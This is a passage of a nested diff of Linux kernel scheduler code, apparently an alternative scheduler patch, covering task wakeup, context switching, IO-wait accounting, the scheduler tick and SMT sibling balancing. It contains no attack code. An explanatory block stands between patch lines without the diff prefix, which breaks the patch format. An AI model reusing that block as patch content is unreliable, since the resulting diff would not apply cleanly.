-+late_initcall(sched_core_sysctl_init);
-+#endif /* CONFIG_PROC_SYSCTL */
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+/*
-+ * wake_up_new_task - wake up a newly created task for the first time.
-+ *
-+ * This function will do some initial scheduler statistics housekeeping
-+ * that must be done for every newly created context, then puts the task
-+ * on the runqueue and wakes it.
-+ */
-+void wake_up_new_task(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+
-+	raw_spin_lock_irqsave(&p->pi_lock, flags);
-+	WRITE_ONCE(p->__state, TASK_RUNNING);
-+	rq = cpu_rq(select_task_rq(p));
-+#ifdef CONFIG_SMP
-+	rseq_migrate(p);
-+	/*
-+	 * Fork balancing, do it here and not earlier because:
-+	 * - cpus_ptr can change in the fork path
-+	 * - any previously selected CPU might disappear through hotplug
-+	 *
-+	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
-+	 * as we're not fully set-up yet.
-+	 */
-+	__set_task_cpu(p, cpu_of(rq));
-+#endif
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	activate_task(p, rq);
-+	trace_sched_wakeup_new(p);
-+	check_preempt_curr(rq);
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+
-+static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
-+
-+void preempt_notifier_inc(void)
-+{
-+	static_branch_inc(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_inc);
-+
-+void preempt_notifier_dec(void)
-+{
-+	static_branch_dec(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_dec);
-+
-+/**
-+ * preempt_notifier_register - tell me when current is being preempted & rescheduled
-+ * @notifier: notifier struct to register
-+ */
-+void preempt_notifier_register(struct preempt_notifier *notifier)
-+{
-+	if (!static_branch_unlikely(&preempt_notifier_key))
-+		WARN(1, "registering preempt_notifier while notifiers disabled\n");
-+
-+	hlist_add_head(&notifier->link, &current->preempt_notifiers);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_register);
-+
-+/**
-+ * preempt_notifier_unregister - no longer interested in preemption notifications
-+ * @notifier: notifier struct to unregister
-+ *
-+ * This is *not* safe to call from within a preemption notifier.
-+ */
-+void preempt_notifier_unregister(struct preempt_notifier *notifier)
-+{
-+	hlist_del(&notifier->link);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
-+
-+static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_in(notifier, raw_smp_processor_id());
-+}
-+
-+static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_in_preempt_notifiers(curr);
-+}
-+
-+static void
-+__fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				   struct task_struct *next)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_out(notifier, next);
-+}
-+
-+static __always_inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_out_preempt_notifiers(curr, next);
-+}
-+
-+#else /* !CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+}
-+
-+static inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+}
-+
-+#endif /* CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void prepare_task(struct task_struct *next)
-+{
-+	/*
-+	 * Claim the task as running; we do this before switching to it
-+	 * such that any running task will have this set.
-+	 *
-+	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
-+	 * its ordering comment.
-+	 */
-+	WRITE_ONCE(next->on_cpu, 1);
-+}
-+
-+static inline void finish_task(struct task_struct *prev)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * This must be the very last reference to @prev from this CPU. After
-+	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
-+	 * must ensure this doesn't happen until the switch is completely
-+	 * finished.
-+	 *
-+	 * In particular, the load of prev->state in finish_task_switch() must
-+	 * happen before this.
-+	 *
-+	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
-+	 */
-+	smp_store_release(&prev->on_cpu, 0);
-+#else
-+	prev->on_cpu = 0;
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	void (*func)(struct rq *rq);
-+	struct balance_callback *next;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	while (head) {
-+		func = (void (*)(struct rq *))head->func;
-+		next = head->next;
-+		head->next = NULL;
-+		head = next;
-+
-+		func(rq);
-+	}
-+}
-+
-+static void balance_push(struct rq *rq);
-+
-+/*
-+ * balance_push_callback is a right abuse of the callback interface and plays
-+ * by significantly different rules.
-+ *
-+ * Where the normal balance_callback's purpose is to be run in the same context
-+ * that queued it (only later, when it's safe to drop rq->lock again),
-+ * balance_push_callback is specifically targeted at __schedule().
-+ *
-+ * This abuse is tolerated because it places all the unlikely/odd cases behind
-+ * a single test, namely: rq->balance_callback == NULL.
-+ */
-+struct balance_callback balance_push_callback = {
-+	.next = NULL,
-+	.func = balance_push,
-+};
-+
-+static inline struct balance_callback *
-+__splice_balance_callbacks(struct rq *rq, bool split)
-+{
-+	struct balance_callback *head = rq->balance_callback;
-+
-+	if (likely(!head))
-+		return NULL;
-+
-+	lockdep_assert_rq_held(rq);
-+	/*
-+	 * Must not take balance_push_callback off the list when
-+	 * splice_balance_callbacks() and balance_callbacks() are not
-+	 * in the same rq->lock section.
-+	 *
-+	 * In that case it would be possible for __schedule() to interleave
-+	 * and observe the list empty.
-+	 */
-+	if (split && head == &balance_push_callback)
-+		head = NULL;
-+	else
-+		rq->balance_callback = NULL;
-+
-+	return head;
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return __splice_balance_callbacks(rq, true);
-+}
-+
-+static void __balance_callbacks(struct rq *rq)
-+{
-+	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	unsigned long flags;
-+
-+	if (unlikely(head)) {
-+		raw_spin_lock_irqsave(&rq->lock, flags);
-+		do_balance_callbacks(rq, head);
-+		raw_spin_unlock_irqrestore(&rq->lock, flags);
-+	}
-+}
-+
-+#else
-+
-+static inline void __balance_callbacks(struct rq *rq)
-+{
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return NULL;
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+}
-+
-+#endif
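A sketch of the calling pattern the three helpers above exist for (the decision step is a placeholder): queue callbacks while holding rq->lock, detach them before dropping it, then run them once the lock may safely be retaken:

	struct balance_callback *head;

	raw_spin_lock(&rq->lock);
	/* ... scheduling decisions that may queue rq->balance_callback ... */
	head = splice_balance_callbacks(rq);	/* detach under rq->lock */
	raw_spin_unlock(&rq->lock);

	balance_callbacks(rq, head);		/* re-takes rq->lock to run the batch */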
-+
-+static inline void
-+prepare_lock_switch(struct rq *rq, struct task_struct *next)
-+{
-+	/*
-+	 * The runqueue lock will be released by the next
-+	 * task (which is an invalid locking op but in the case
-+	 * of the scheduler it's an obvious special-case), so we
-+	 * do an early lockdep release here:
-+	 */
-+	spin_release(&rq->lock.dep_map, _THIS_IP_);
-+#ifdef CONFIG_DEBUG_SPINLOCK
-+	/* this is a valid case when another task releases the spinlock */
-+	rq->lock.owner = next;
-+#endif
-+}
-+
-+static inline void finish_lock_switch(struct rq *rq)
-+{
-+	/*
-+	 * If we are tracking spinlock dependencies then we have to
-+	 * fix up the runqueue lock - which gets 'carried over' from
-+	 * prev into current:
-+	 */
-+	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
-+	__balance_callbacks(rq);
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+/*
-+ * NOP if the arch has not defined these:
-+ */
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+static inline void kmap_local_sched_out(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_out();
-+#endif
-+}
-+
-+static inline void kmap_local_sched_in(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_in();
-+#endif
-+}
-+
-+/**
-+ * prepare_task_switch - prepare to switch tasks
-+ * @rq: the runqueue preparing to switch
-+ * @next: the task we are going to switch to.
-+ *
-+ * This is called with the rq lock held and interrupts off. It must
-+ * be paired with a subsequent finish_task_switch after the context
-+ * switch.
-+ *
-+ * prepare_task_switch sets up locking and calls architecture specific
-+ * hooks.
-+ */
-+static inline void
-+prepare_task_switch(struct rq *rq, struct task_struct *prev,
-+		    struct task_struct *next)
-+{
-+	kcov_prepare_switch(prev);
-+	sched_info_switch(rq, prev, next);
-+	perf_event_task_sched_out(prev, next);
-+	rseq_preempt(prev);
-+	fire_sched_out_preempt_notifiers(prev, next);
-+	kmap_local_sched_out();
-+	prepare_task(next);
-+	prepare_arch_switch(next);
-+}
-+
-+/**
-+ * finish_task_switch - clean up after a task-switch
-+ * @rq: runqueue associated with task-switch
-+ * @prev: the thread we just switched away from.
-+ *
-+ * finish_task_switch must be called after the context switch, paired
-+ * with a prepare_task_switch call before the context switch.
-+ * finish_task_switch will reconcile locking set up by prepare_task_switch,
-+ * and do any other architecture-specific cleanup actions.
-+ *
-+ * Note that we may have delayed dropping an mm in context_switch(). If
-+ * so, we finish that here outside of the runqueue lock.  (Doing it
-+ * with the lock held can cause deadlocks; see schedule() for
-+ * details.)
-+ *
-+ * The context switch has flipped the stack from under us and restored the
-+ * local variables which were saved when this task called schedule() in the
-+ * past. prev == current is still correct but we need to recalculate this_rq
-+ * because prev may have moved to another CPU.
-+ */
-+static struct rq *finish_task_switch(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	struct rq *rq = this_rq();
-+	struct mm_struct *mm = rq->prev_mm;
-+	unsigned int prev_state;
-+
-+	/*
-+	 * The previous task will have left us with a preempt_count of 2
-+	 * because it left us after:
-+	 *
-+	 *	schedule()
-+	 *	  preempt_disable();			// 1
-+	 *	  __schedule()
-+	 *	    raw_spin_lock_irq(&rq->lock)	// 2
-+	 *
-+	 * Also, see FORK_PREEMPT_COUNT.
-+	 */
-+	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
-+		      "corrupted preempt_count: %s/%d/0x%x\n",
-+		      current->comm, current->pid, preempt_count()))
-+		preempt_count_set(FORK_PREEMPT_COUNT);
-+
-+	rq->prev_mm = NULL;
-+
-+	/*
-+	 * A task struct has one reference for the use as "current".
-+	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
-+	 * schedule one last time. The schedule call will never return, and
-+	 * the scheduled task must drop that reference.
-+	 *
-+	 * We must observe prev->state before clearing prev->on_cpu (in
-+	 * finish_task), otherwise a concurrent wakeup can get prev
-+	 * running on another CPU and we could race with its RUNNING -> DEAD
-+	 * transition, resulting in a double drop.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	vtime_task_switch(prev);
-+	perf_event_task_sched_in(prev, current);
-+	finish_task(prev);
-+	tick_nohz_task_switch();
-+	finish_lock_switch(rq);
-+	finish_arch_post_lock_switch();
-+	kcov_finish_switch(current);
-+	/*
-+	 * kmap_local_sched_out() is invoked with rq::lock held and
-+	 * interrupts disabled. There is no requirement for that, but the
-+	 * sched out code does not have an interrupt enabled section.
-+	 * Restoring the maps on sched in does not require interrupts being
-+	 * disabled either.
-+	 */
-+	kmap_local_sched_in();
-+
-+	fire_sched_in_preempt_notifiers(current);
-+	/*
-+	 * When switching through a kernel thread, the loop in
-+	 * membarrier_{private,global}_expedited() may have observed that
-+	 * kernel thread and not issued an IPI. It is therefore possible to
-+	 * schedule between user->kernel->user threads without passing through
-+	 * switch_mm(). Membarrier requires a barrier after storing to
-+	 * rq->curr, before returning to userspace, so provide them here:
-+	 *
-+	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
-+	 *   provided by mmdrop(),
-+	 * - a sync_core for SYNC_CORE.
-+	 */
-+	if (mm) {
-+		membarrier_mm_sync_core_before_usermode(mm);
-+		mmdrop_sched(mm);
-+	}
-+	if (unlikely(prev_state == TASK_DEAD)) {
-+		/* Task is done with its stack. */
-+		put_task_stack(prev);
-+
-+		put_task_struct_rcu_user(prev);
-+	}
-+
-+	return rq;
-+}
-+
-+/**
-+ * schedule_tail - first thing a freshly forked thread must call.
-+ * @prev: the thread we just switched away from.
-+ */
-+asmlinkage __visible void schedule_tail(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	/*
-+	 * New tasks start with FORK_PREEMPT_COUNT, see there and
-+	 * finish_task_switch() for details.
-+	 *
-+	 * finish_task_switch() will drop rq->lock() and lower preempt_count
-+	 * and the preempt_enable() will end up enabling preemption (on
-+	 * PREEMPT_COUNT kernels).
-+	 */
-+
-+	finish_task_switch(prev);
-+	preempt_enable();
-+
-+	if (current->set_child_tid)
-+		put_user(task_pid_vnr(current), current->set_child_tid);
-+
-+	calculate_sigpending();
-+}
-+
-+/*
-+ * context_switch - switch to the new MM and the new thread's register state.
-+ */
-+static __always_inline struct rq *
-+context_switch(struct rq *rq, struct task_struct *prev,
-+	       struct task_struct *next)
-+{
-+	prepare_task_switch(rq, prev, next);
-+
-+	/*
-+	 * For paravirt, this is coupled with an exit in switch_to to
-+	 * combine the page table reload and the switch backend into
-+	 * one hypercall.
-+	 */
-+	arch_start_context_switch(prev);
-+
-+	/*
-+	 * kernel -> kernel   lazy + transfer active
-+	 *   user -> kernel   lazy + mmgrab() active
-+	 *
-+	 * kernel ->   user   switch + mmdrop() active
-+	 *   user ->   user   switch
-+	 */
-+	if (!next->mm) {                                // to kernel
-+		enter_lazy_tlb(prev->active_mm, next);
-+
-+		next->active_mm = prev->active_mm;
-+		if (prev->mm)                           // from user
-+			mmgrab(prev->active_mm);
-+		else
-+			prev->active_mm = NULL;
-+	} else {                                        // to user
-+		membarrier_switch_mm(rq, prev->active_mm, next->mm);
-+		/*
-+		 * sys_membarrier() requires an smp_mb() between setting
-+		 * rq->curr / membarrier_switch_mm() and returning to userspace.
-+		 *
-+		 * The below provides this either through switch_mm(), or in
-+		 * case 'prev->active_mm == next->mm' through
-+		 * finish_task_switch()'s mmdrop().
-+		 */
-+		switch_mm_irqs_off(prev->active_mm, next->mm, next);
-+		lru_gen_use_mm(next->mm);
-+
-+		if (!prev->mm) {                        // from kernel
-+			/* will mmdrop() in finish_task_switch(). */
-+			rq->prev_mm = prev->active_mm;
-+			prev->active_mm = NULL;
-+		}
-+	}
-+
-+	prepare_lock_switch(rq, next);
-+
-+	/* Here we just switch the register state and the stack. */
-+	switch_to(prev, next, prev);
-+	barrier();
-+
-+	return finish_task_switch(prev);
-+}
-+
-+/*
-+ * nr_running, nr_uninterruptible and nr_context_switches:
-+ *
-+ * externally visible scheduler statistics: current number of runnable
-+ * threads, total number of context switches performed since bootup.
-+ */
-+unsigned int nr_running(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_online_cpu(i)
-+		sum += cpu_rq(i)->nr_running;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Check if only the current task is running on the CPU.
-+ *
-+ * Caution: this function does not check that the caller has disabled
-+ * preemption, thus the result might have a time-of-check-to-time-of-use
-+ * race.  The caller is responsible for using it correctly, for example:
-+ *
-+ * - from a non-preemptible section (of course)
-+ *
-+ * - from a thread that is bound to a single CPU
-+ *
-+ * - in a loop with very short iterations (e.g. a polling loop)
-+ */
-+bool single_task_running(void)
-+{
-+	return raw_rq()->nr_running == 1;
-+}
-+EXPORT_SYMBOL(single_task_running);
-+
-+unsigned long long nr_context_switches(void)
-+{
-+	int i;
-+	unsigned long long sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += cpu_rq(i)->nr_switches;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Consumers of these two interfaces, like for example the cpuidle menu
-+ * governor, are using nonsensical data: they prefer shallow idle state
-+ * selection for a CPU that has IO-wait, even though the waiting task might
-+ * not even end up running on that CPU when it does become runnable.
-+ */
-+
-+unsigned int nr_iowait_cpu(int cpu)
-+{
-+	return atomic_read(&cpu_rq(cpu)->nr_iowait);
-+}
-+
-+/*
-+ * IO-wait accounting, and how it's mostly bollocks (on SMP).
-+ *
-+ * The idea behind IO-wait accounting is to account the idle time that we
-+ * could have spent running if it were not for IO. That is, if we were to
-+ * improve the
-+ * storage performance, we'd have a proportional reduction in IO-wait time.
-+ *
-+ * This all works nicely on UP, where, when a task blocks on IO, we account
-+ * idle time as IO-wait, because if the storage were faster, it could've been
-+ * running and we'd not be idle.
-+ *
-+ * This has been extended to SMP, by doing the same for each CPU. This however
-+ * is broken.
-+ *
-+ * Imagine for instance the case where two tasks block on one CPU, only the one
-+ * CPU will have IO-wait accounted, while the other has regular idle. Even
-+ * though, if the storage were faster, both could've run at the same time,
-+ * utilising both CPUs.
-+ *
-+ * This means that, when looking globally, the current IO-wait accounting on
-+ * SMP is a lower bound, by reason of under-accounting.
-+ *
-+ * Worse, since the numbers are provided per CPU, they are sometimes
-+ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
-+ * associated with any one particular CPU, it can wake to another CPU than it
-+ * blocked on. This means the per CPU IO-wait number is meaningless.
-+ *
-+ * Task CPU affinities can make all that even more 'interesting'.
-+ */
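-+
-+/*
-+ * Worked example of the above (hypothetical numbers): tasks A and B both
-+ * block on IO while last running on CPU0. For the next 10ms, CPU0 idles
-+ * in "iowait" while CPU1 idles "plain", so the system reports 10ms of
-+ * IO-wait. Had the storage been infinitely fast, A and B could have run
-+ * in parallel on both CPUs -- up to 20ms of lost CPU time, hence the
-+ * "lower bound" above. And if A later wakes up on CPU1, its wait was
-+ * never visible in CPU1's numbers at all.
-+ */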
-+
-+unsigned int nr_iowait(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += nr_iowait_cpu(i);
-+
-+	return sum;
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+/*
-+ * sched_exec - execve() is a valuable balancing opportunity, because at
-+ * this point the task has the smallest effective memory and cache
-+ * footprint.
-+ */
-+void sched_exec(void)
-+{
-+}
-+
-+#endif
-+
-+DEFINE_PER_CPU(struct kernel_stat, kstat);
-+DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
-+
-+EXPORT_PER_CPU_SYMBOL(kstat);
-+EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
-+
-+static inline void update_curr(struct rq *rq, struct task_struct *p)
-+{
-+	s64 ns = rq->clock_task - p->last_ran;
-+
-+	p->sched_time += ns;
-+	cgroup_account_cputime(p, ns);
-+	account_group_exec_runtime(p, ns);
-+
-+	p->time_slice -= ns;
-+	p->last_ran = rq->clock_task;
-+}
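-+
-+/*
-+ * Example with hypothetical numbers: if 2ms of task clock have elapsed
-+ * since p->last_ran, update_curr() adds 2ms to p->sched_time and takes
-+ * 2ms off p->time_slice. Once p->time_slice drops below RESCHED_NS,
-+ * scheduler_task_tick()/check_curr() below mark the task for reschedule.
-+ */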
-+
-+/*
-+ * Return accounted runtime for the task, including the current pending
-+ * runtime that has not been accounted yet.
-+ */
-+unsigned long long task_sched_runtime(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	u64 ns;
-+
-+#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
-+	/*
-+	 * 64-bit doesn't need locks to atomically read a 64-bit value.
-+	 * So we have an optimization opportunity when the task's delta_exec is 0.
-+	 * Reading ->on_cpu is racy, but this is ok.
-+	 *
-+	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
-+	 * If we race with it entering CPU, unaccounted time is 0. This is
-+	 * indistinguishable from the read occurring a few cycles earlier.
-+	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
-+	 * been accounted, so we're correct here as well.
-+	 */
-+	if (!p->on_cpu || !task_on_rq_queued(p))
-+		return tsk_seruntime(p);
-+#endif
-+
-+	rq = task_access_lock_irqsave(p, &lock, &flags);
-+	/*
-+	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
-+	 * project cycles that may never be accounted to this
-+	 * thread, breaking clock_gettime().
-+	 */
-+	if (p == rq->curr && task_on_rq_queued(p)) {
-+		update_rq_clock(rq);
-+		update_curr(rq, p);
-+	}
-+	ns = tsk_seruntime(p);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+	return ns;
-+}
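-+
-+/*
-+ * This is what backs the POSIX per-thread/per-process CPU clocks, e.g.
-+ * from userspace (illustrative):
-+ *
-+ *	struct timespec ts;
-+ *	clock_gettime(CLOCK_THREAD_CPUTIME_ID, &ts);
-+ */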
-+
-+/* This manages tasks that have run out of timeslice during a scheduler_tick */
-+static inline void scheduler_task_tick(struct rq *rq)
-+{
-+	struct task_struct *p = rq->curr;
-+
-+	if (is_idle_task(p))
-+		return;
-+
-+	update_curr(rq, p);
-+	cpufreq_update_util(rq, 0);
-+
-+	/*
-+	 * Tasks that have less than RESCHED_NS of time slice left will be
-+	 * rescheduled.
-+	 */
-+	if (p->time_slice >= RESCHED_NS)
-+		return;
-+	set_tsk_need_resched(p);
-+	set_preempt_need_resched();
-+}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+static u64 cpu_resched_latency(struct rq *rq)
-+{
-+	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
-+	u64 resched_latency, now = rq_clock(rq);
-+	static bool warned_once;
-+
-+	if (sysctl_resched_latency_warn_once && warned_once)
-+		return 0;
-+
-+	if (!need_resched() || !latency_warn_ms)
-+		return 0;
-+
-+	if (system_state == SYSTEM_BOOTING)
-+		return 0;
-+
-+	if (!rq->last_seen_need_resched_ns) {
-+		rq->last_seen_need_resched_ns = now;
-+		rq->ticks_without_resched = 0;
-+		return 0;
-+	}
-+
-+	rq->ticks_without_resched++;
-+	resched_latency = now - rq->last_seen_need_resched_ns;
-+	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
-+		return 0;
-+
-+	warned_once = true;
-+
-+	return resched_latency;
-+}
-+
-+static int __init setup_resched_latency_warn_ms(char *str)
-+{
-+	long val;
-+
-+	if ((kstrtol(str, 0, &val))) {
-+		pr_warn("Unable to set resched_latency_warn_ms\n");
-+		return 1;
-+	}
-+
-+	sysctl_resched_latency_warn_ms = val;
-+	return 1;
-+}
-+__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
-+#else
-+static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+/*
-+ * This function gets called by the timer code, with HZ frequency.
-+ * We call it with interrupts disabled.
-+ */
-+void scheduler_tick(void)
-+{
-+	int cpu __maybe_unused = smp_processor_id();
-+	struct rq *rq = cpu_rq(cpu);
-+	u64 resched_latency;
-+
-+	arch_scale_freq_tick();
-+	sched_clock_tick();
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	scheduler_task_tick(rq);
-+	if (sched_feat(LATENCY_WARN))
-+		resched_latency = cpu_resched_latency(rq);
-+	calc_global_load_tick(rq);
-+
-+	rq->last_tick = rq->clock;
-+	raw_spin_unlock(&rq->lock);
-+
-+	if (sched_feat(LATENCY_WARN) && resched_latency)
-+		resched_latency_warn(cpu, resched_latency);
-+
-+	perf_event_task_tick();
-+}
-+
-+#ifdef CONFIG_SCHED_SMT
-+static inline int sg_balance_cpu_stop(void *data)
-+{
-+	struct rq *rq = this_rq();
-+	struct task_struct *p = data;
-+	cpumask_t tmp;
-+	unsigned long flags;
-+
-+	local_irq_save(flags);
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->active_balance = 0;
-+	/* _something_ may have changed the task, double check again */
-+	if (task_on_rq_queued(p) && task_rq(p) == rq &&
-+	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
-+	    !is_migration_disabled(p)) {
-+		int cpu = cpu_of(rq);
-+		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
-+		rq = move_queued_task(rq, p, dcpu);
-+	}
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock(&p->pi_lock);
-+
-+	local_irq_restore(flags);
-+
-+	return 0;
-+}
-+
-+/* sg_balance_trigger - trigger sibling group balance for @cpu */
-+static inline int sg_balance_trigger(const int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	struct task_struct *curr;
-+	int res;
-+
-+	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
-+		return 0;
-+	curr = rq->curr;
-+	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&
-+	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&
-+	      !is_migration_disabled(curr) && (!rq->active_balance);
-+
-+	if (res)
-+		rq->active_balance = 1;
-+
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	if (res)
-+		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
-+				    &rq->active_balance_work);
-+	return res;
-+}
-+
-+/*
-+ * sg_balance - sibling group balance check for run queue @rq
-+ */
-+static inline void sg_balance(struct rq *rq)
-+{
-+	cpumask_t chk;
-+	int cpu = cpu_of(rq);
-+
-+	/* exit when cpu is offline */
-+	if (unlikely(!rq->online))
-+		return;
-+
-+	/*
-+	 * Only a cpu in the sibling idle group will do the checking and then
-+	 * find potential cpus from which the current running task can be migrated
-+	 */
-+	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
-+	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
-+		int i;
-+
-+		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (!cpumask_intersects(cpu_smt_mask(i), sched_idle_mask) &&
-+			    sg_balance_trigger(i))
-+				return;
-+		}
-+	}
-+}
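-+
-+/*
-+ * Scenario sketch for the above (hypothetical SMT2 machine): both
-+ * siblings of core0 are idle, so they sit in sched_sg_idle_mask. CPU0
-+ * then scans for an online, busy CPU with no pending tasks whose SMT
-+ * siblings are busy as well, and lets the stopper migrate that CPU's
-+ * single running task over to the idle sibling group.
-+ */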
-+#endif /* CONFIG_SCHED_SMT */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+
-+struct tick_work {
-+	int			cpu;
-+	atomic_t		state;
-+	struct delayed_work	work;
-+};
-+/* Values for ->state, see diagram below. */
-+#define TICK_SCHED_REMOTE_OFFLINE	0
-+#define TICK_SCHED_REMOTE_OFFLINING	1
-+#define TICK_SCHED_REMOTE_RUNNING	2
-+
-+/*
-+ * State diagram for ->state:
-+ *
-+ *
-+ *          TICK_SCHED_REMOTE_OFFLINE
-+ *                    |   ^
-+ *                    |   |
-+ *                    |   | sched_tick_remote()
-+ *                    |   |
-+ *                    |   |
-+ *                    +--TICK_SCHED_REMOTE_OFFLINING
-+ *                    |   ^
-+ *                    |   |
-+ * sched_tick_start() |   | sched_tick_stop()
-+ *                    |   |
-+ *                    V   |
-+ *          TICK_SCHED_REMOTE_RUNNING
-+ *
-+ *
-+ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
-+ * and sched_tick_start() are happy to leave the state in RUNNING.
-+ */
-+
-+static struct tick_work __percpu *tick_work_cpu;
-+
-+static void sched_tick_remote(struct work_struct *work)
-+{
-+	struct delayed_work *dwork = to_delayed_work(work);
-+	struct tick_work *twork = container_of(dwork, struct tick_work, work);
-+	int cpu = twork->cpu;
-+	struct rq *rq = cpu_rq(cpu);
-+	struct task_struct *curr;
-+	unsigned long flags;
-+	u64 delta;
-+	int os;
-+
-+	/*
-+	 * Handle the tick only if it appears the remote CPU is running in full
-+	 * dynticks mode. The check is racy by nature, but missing a tick or
-+	 * having one too many is no big deal because the scheduler tick updates
-+	 * statistics and checks timeslices in a time-independent way, regardless
-+	 * of when exactly it is running.
-+	 */
-+	if (!tick_nohz_tick_stopped_cpu(cpu))
-+		goto out_requeue;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	curr = rq->curr;
-+	if (cpu_is_offline(cpu))
-+		goto out_unlock;
-+
-+	update_rq_clock(rq);
-+	if (!is_idle_task(curr)) {
-+		/*
-+		 * Make sure the next tick runs within a reasonable
-+		 * amount of time.
-+		 */
-+		delta = rq_clock_task(rq) - curr->last_ran;
-+		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
-+	}
-+	scheduler_task_tick(rq);
-+
-+	calc_load_nohz_remote(rq);
-+out_unlock:
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out_requeue:
-+	/*
-+	 * Run the remote tick once per second (1Hz). This arbitrary
-+	 * frequency is large enough to avoid overload but short enough
